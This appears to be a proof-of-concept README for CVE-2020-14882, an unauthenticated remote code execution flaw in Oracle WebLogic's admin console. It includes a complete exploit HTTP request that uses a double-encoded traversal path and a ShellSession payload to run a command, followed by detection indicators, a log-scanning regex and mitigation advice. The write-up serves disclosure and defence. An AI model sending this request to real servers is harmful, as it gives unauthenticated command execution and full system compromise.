CVE-2020-14882# 🌐 **CVE-2020-14882 — Oracle WebLogic Server Remote Code Execution**
---
### 🧩 Overview
<img width="728" height="380" alt="68747470733a2f2f312e62702e626c6f6773706f742e636f6d2f2d484d416a577257703832672f58366a48483574346551492f41414141414141414c41592f53685f72544c72325056305650794b62585f467434676c4d493836536a42477051434c63424741735948512f7" src="https://github.com/user-attachments/assets/21da5932-f55a-45bd-b21c-377b59291980" />
**CVE-2020-14882** is a **critical unauthenticated Remote Code Execution (RCE)** vulnerability in **Oracle WebLogic Server’s Administration Console**.
An attacker can exploit it remotely — without any login credentials — using a specially crafted HTTP request to gain full control of the server.
* **Vendor:** Oracle
* **Component:** WebLogic Server Console
* **CVSS v3.1 Score:** 9.8 (Critical)
* **Disclosure Date:** October 2020
* **Attack Vector:** Network (HTTP request)
* **Authentication Required:** None
---
### ⚙️ Requests
```
POST /console/images/%252E%252E%252Fconsole.portal HTTP/1.1
Host: <Target IP>
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-type: application/x-www-form-urlencoded; charset=utf-8
Content-Length: 128
_nfpb=false&_pageLable=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime().exec('ipconfig');");
```
<img width="1920" height="959" alt="CVE-2020-14882 oracle weblogic 1" src="https://github.com/user-attachments/assets/92bf111c-93ac-42d4-bd0a-bad7bcec69c6" />
<img width="1920" height="959" alt="CVE-2020-14882 oracle weblogic 2" src="https://github.com/user-attachments/assets/ea72ebcd-968b-4d38-b4fc-59ae45b9fea9" />
<img width="1920" height="959" alt="CVE-2020-14882 oracle weblogic 3" src="https://github.com/user-attachments/assets/86c40a84-a601-4bcb-8dca-e3fd21199a36" />
<img width="1920" height="957" alt="CVE-2020-14882 oracle weblogic 4" src="https://github.com/user-attachments/assets/5f078cef-e2ce-4156-aa06-eeae7f393c9d" />
<img width="1920" height="958" alt="CVE-2020-14882 oracle weblogic 5" src="https://github.com/user-attachments/assets/51136ef8-7a65-4d6b-ac5d-c70a9e643a3f" />
---
### ⚙️ Affected Versions
The following WebLogic Server versions are known to be vulnerable:
* 10.3.6.0.0
* 12.1.3.0.0
* 12.2.1.3.0
* 12.2.1.4.0
* 14.1.1.0.0
(Other patch levels or customized builds may also be at risk if not updated.)
---
### 🧠 Root Cause & Technical Details
The flaw lies in the **WebLogic Administration Console**’s improper input validation.
By sending a **specially crafted URL** with **double URL encoding**, an attacker can **bypass authentication and access internal server functions**.
Typical exploit path example:
```
/console/css/%252e%252e%252fconsole.portal
```
Here `%252e%252e%252f` represents a **double-encoded directory traversal sequence**, allowing the attacker to escape the normal path and reach sensitive console code.
Once accessed, this can trigger remote command execution or webshell upload.
---
### 💣 Impact
* **Full remote code execution** with the privileges of the WebLogic process.
* **No authentication** required.
* **Complete system compromise** possible — attackers can deploy malware, steal data, or pivot deeper into the network.
Common exploitation results:
* Deployment of JSP-based **webshells**
* **Cryptomining** or **ransomware** installation
* **Persistence mechanisms** added to compromised systems
---
### 🕓 Timeline of Events
* **October 2020:** Oracle releases a Critical Patch Update addressing CVE-2020-14882.
* **Within days:** Public proof-of-concept (PoC) exploits appear online.
* **Following weeks:** Massive wave of exploitation observed — attackers scanning and exploiting exposed WebLogic servers globally.
* **Subsequent months:** Used in several major attack campaigns (cryptominers, ransomware, espionage).
---
### 🔍 Detection & Indicators of Compromise
**1. Access Logs**
Look for suspicious HTTP requests containing encoded traversal sequences such as:
```
%252e%252e%252fconsole
```
or
```
/console/css/.../console.portal
```
**2. File System Changes**
* Unrecognized `.jsp` files appearing under application directories.
* New or altered `.war` deployments.
**3. Process Activity**
* The WebLogic `java` process spawning shell commands (`/bin/sh`, `cmd.exe`).
* Unexpected outbound network connections from the WebLogic host.
**4. Persistence Artifacts**
* Suspicious scheduled tasks or startup scripts.
* Communication with mining pools or command-and-control servers.
---
### 🛡️ Mitigation & Remediation
**Immediate Actions:**
1. **Patch Immediately** — Apply Oracle’s October 2020 Critical Patch Update or later cumulative patches.
2. **Restrict Access** — Limit WebLogic Console access to trusted IPs or management networks only.
3. **Block Exploits** — Use a WAF or proxy rule to block requests containing encoded traversal patterns such as `%252e%252e%252f`.
4. **Disable Console** if not required in production.
**If Compromise Is Suspected:**
* Isolate the affected system from the network.
* Search logs and file systems for IOCs mentioned above.
* Rebuild the system from a known-good image.
* Rotate credentials and check for lateral movement.
---
### 🧰 Example Detection Pattern
Regular expression for scanning logs:
```
%25(2e|2E){2}%25(2f|2F)
```
This captures **double-encoded “../” traversal** attempts often used in CVE-2020-14882 exploits.
---
### 🧱 Defense-in-Depth Recommendations
* **Patch Management:** Keep WebLogic up to date and test patches before deployment.
* **Segmentation:** Keep administrative consoles off public networks.
* **Monitoring:** Enable detailed logging and feed data to your SIEM.
* **Incident Response Plan:** Prepare automated alerts for abnormal console access patterns.
---
### 🚨 Why It’s Important
CVE-2020-14882 remains a textbook example of a **critical enterprise RCE** — easy to exploit, devastating in impact, and widely weaponized.
It underscores the need for **prompt patching**, **network isolation of management interfaces**, and **continuous monitoring** for exploitation attempts.
---
[4.0K] /data/pocs/f601023e64259cafe712b3aacbea300ed40807e7
└── [6.2K] README.md
1 directory, 1 file